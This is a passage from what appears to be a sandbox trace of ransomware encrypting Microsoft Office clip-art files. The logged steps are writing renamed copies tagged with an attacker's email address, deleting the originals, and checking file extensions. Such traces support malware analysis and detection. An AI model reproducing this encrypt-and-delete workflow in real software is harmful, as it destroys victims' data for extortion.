Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf")) returned 0x20 [0271.625] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.625] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.625] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.625] GetLastError () returned 0x0 [0271.625] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x91c, lpOverlapped=0x0) returned 1 [0271.627] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x920, lpOverlapped=0x0) returned 1 [0271.628] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.628] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.628] SetEndOfFile (hFile=0x3a8) returned 1 [0271.628] CloseHandle (hObject=0x3a8) returned 1 [0271.628] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.628] SetEndOfFile (hFile=0x380) returned 1 [0271.630] CloseHandle (hObject=0x380) returned 1 [0271.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf")) returned 1 [0271.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.631] lstrlenW (lpString=".doc") returned 4 [0271.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.631] lstrlenW (lpString=".docx") returned 5 [0271.631] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.631] lstrlenW (lpString=".pdf") returned 4 [0271.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.631] lstrlenW (lpString=".xls") returned 4 [0271.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.631] lstrlenW (lpString=".xlsx") returned 5 [0271.631] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.632] lstrlenW (lpString=".ppt") returned 4 [0271.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.632] lstrlenW (lpString=".zip") returned 4 [0271.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.632] lstrlenW (lpString=".rar") returned 4 [0271.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.632] lstrlenW (lpString=".bz2") returned 4 [0271.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.632] lstrlenW (lpString=".7z") returned 3 [0271.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.632] lstrlenW (lpString=".dbf") returned 4 [0271.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.632] lstrlenW (lpString=".1cd") returned 4 [0271.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.632] lstrlenW (lpString=".jpg") returned 4 [0271.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.632] lstrlenW (lpString=".doc") returned 4 [0271.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.632] lstrlenW (lpString=".docx") returned 5 [0271.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.632] lstrlenW (lpString=".pdf") returned 4 [0271.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.632] lstrlenW (lpString=".xls") returned 4 [0271.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.632] lstrlenW (lpString=".xlsx") returned 5 [0271.633] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.633] lstrlenW (lpString=".ppt") returned 4 [0271.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.633] lstrlenW (lpString=".zip") returned 4 [0271.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.633] lstrlenW (lpString=".rar") returned 4 [0271.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.633] lstrlenW (lpString=".bz2") returned 4 [0271.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.633] lstrlenW (lpString=".7z") returned 3 [0271.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.633] lstrlenW (lpString=".dbf") returned 4 [0271.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.633] lstrlenW (lpString=".1cd") returned 4 [0271.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63 [0271.633] lstrlenW (lpString=".jpg") returned 4 [0271.633] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.633] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.633] lstrlenW (lpString="FD01548_.WMF") returned 12 [0271.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.634] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=10316) returned 1 [0271.634] CloseHandle (hObject=0x380) returned 1 [0271.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf")) returned 0x20 [0271.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.634] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.634] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.634] GetLastError () returned 0x0 [0271.634] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x284c, lpOverlapped=0x0) returned 1 [0271.837] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x2850, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x2850, lpOverlapped=0x0) returned 1 [0271.860] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.860] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.860] SetEndOfFile (hFile=0x3a8) returned 1 [0271.860] CloseHandle (hObject=0x3a8) returned 1 [0271.860] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.860] SetEndOfFile (hFile=0x380) returned 1 [0271.862] CloseHandle (hObject=0x380) returned 1 [0271.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.863] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01548_.wmf")) returned 1 [0271.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.863] lstrlenW (lpString=".doc") returned 4 [0271.863] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.864] lstrlenW (lpString=".docx") returned 5 [0271.864] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.864] lstrlenW (lpString=".pdf") returned 4 [0271.864] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.864] lstrlenW (lpString=".xls") returned 4 [0271.864] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.864] lstrlenW (lpString=".xlsx") returned 5 [0271.864] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.864] lstrlenW (lpString=".ppt") returned 4 [0271.864] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.864] lstrlenW (lpString=".zip") returned 4 [0271.864] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.864] lstrlenW (lpString=".rar") returned 4 [0271.864] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.864] lstrlenW (lpString=".bz2") returned 4 [0271.864] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.864] lstrlenW (lpString=".7z") returned 3 [0271.864] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.864] lstrlenW (lpString=".dbf") returned 4 [0271.864] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.864] lstrlenW (lpString=".1cd") returned 4 [0271.864] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.864] lstrlenW (lpString=".jpg") returned 4 [0271.864] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.864] lstrlenW (lpString=".doc") returned 4 [0271.864] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.865] lstrlenW (lpString=".docx") returned 5 [0271.865] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.865] lstrlenW (lpString=".pdf") returned 4 [0271.865] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.865] lstrlenW (lpString=".xls") returned 4 [0271.865] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.865] lstrlenW (lpString=".xlsx") returned 5 [0271.865] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.865] lstrlenW (lpString=".ppt") returned 4 [0271.865] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.865] lstrlenW (lpString=".zip") returned 4 [0271.865] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.865] lstrlenW (lpString=".rar") returned 4 [0271.865] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.865] lstrlenW (lpString=".bz2") returned 4 [0271.865] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.865] lstrlenW (lpString=".7z") returned 3 [0271.865] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.865] lstrlenW (lpString=".dbf") returned 4 [0271.865] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.865] lstrlenW (lpString=".1cd") returned 4 [0271.865] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01548_.WMF") returned 63 [0271.865] lstrlenW (lpString=".jpg") returned 4 [0271.865] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.866] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.866] lstrlenW (lpString="FD02153_.WMF") returned 12 [0271.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.866] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=5392) returned 1 [0271.866] CloseHandle (hObject=0x380) returned 1 [0271.866] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf")) returned 0x20 [0271.866] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.866] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.866] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.867] GetLastError () returned 0x0 [0271.867] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x1510, lpOverlapped=0x0) returned 1 [0271.868] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x1520, lpOverlapped=0x0) returned 1 [0271.869] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.869] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.869] SetEndOfFile (hFile=0x3a8) returned 1 [0271.869] CloseHandle (hObject=0x3a8) returned 1 [0271.869] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.869] SetEndOfFile (hFile=0x380) returned 1 [0271.873] CloseHandle (hObject=0x380) returned 1 [0271.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.873] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02153_.wmf")) returned 1 [0271.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.873] lstrlenW (lpString=".doc") returned 4 [0271.873] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.873] lstrlenW (lpString=".docx") returned 5 [0271.874] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.874] lstrlenW (lpString=".pdf") returned 4 [0271.874] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.874] lstrlenW (lpString=".xls") returned 4 [0271.874] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.874] lstrlenW (lpString=".xlsx") returned 5 [0271.874] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.874] lstrlenW (lpString=".ppt") returned 4 [0271.874] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.874] lstrlenW (lpString=".zip") returned 4 [0271.874] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.874] lstrlenW (lpString=".rar") returned 4 [0271.874] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.874] lstrlenW (lpString=".bz2") returned 4 [0271.874] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.874] lstrlenW (lpString=".7z") returned 3 [0271.874] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.874] lstrlenW (lpString=".dbf") returned 4 [0271.874] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.874] lstrlenW (lpString=".1cd") returned 4 [0271.874] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.874] lstrlenW (lpString=".jpg") returned 4 [0271.874] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.874] lstrlenW (lpString=".doc") returned 4 [0271.874] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.874] lstrlenW (lpString=".docx") returned 5 [0271.875] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.875] lstrlenW (lpString=".pdf") returned 4 [0271.875] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.875] lstrlenW (lpString=".xls") returned 4 [0271.875] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.875] lstrlenW (lpString=".xlsx") returned 5 [0271.875] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.875] lstrlenW (lpString=".ppt") returned 4 [0271.875] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.875] lstrlenW (lpString=".zip") returned 4 [0271.875] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.875] lstrlenW (lpString=".rar") returned 4 [0271.875] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.875] lstrlenW (lpString=".bz2") returned 4 [0271.875] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.875] lstrlenW (lpString=".7z") returned 3 [0271.875] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.875] lstrlenW (lpString=".dbf") returned 4 [0271.875] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.875] lstrlenW (lpString=".1cd") returned 4 [0271.875] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 63 [0271.875] lstrlenW (lpString=".jpg") returned 4 [0271.875] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.875] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.876] lstrlenW (lpString="FD02158_.WMF") returned 12 [0271.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.876] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=1648) returned 1 [0271.876] CloseHandle (hObject=0x380) returned 1 [0271.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf")) returned 0x20 [0271.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft 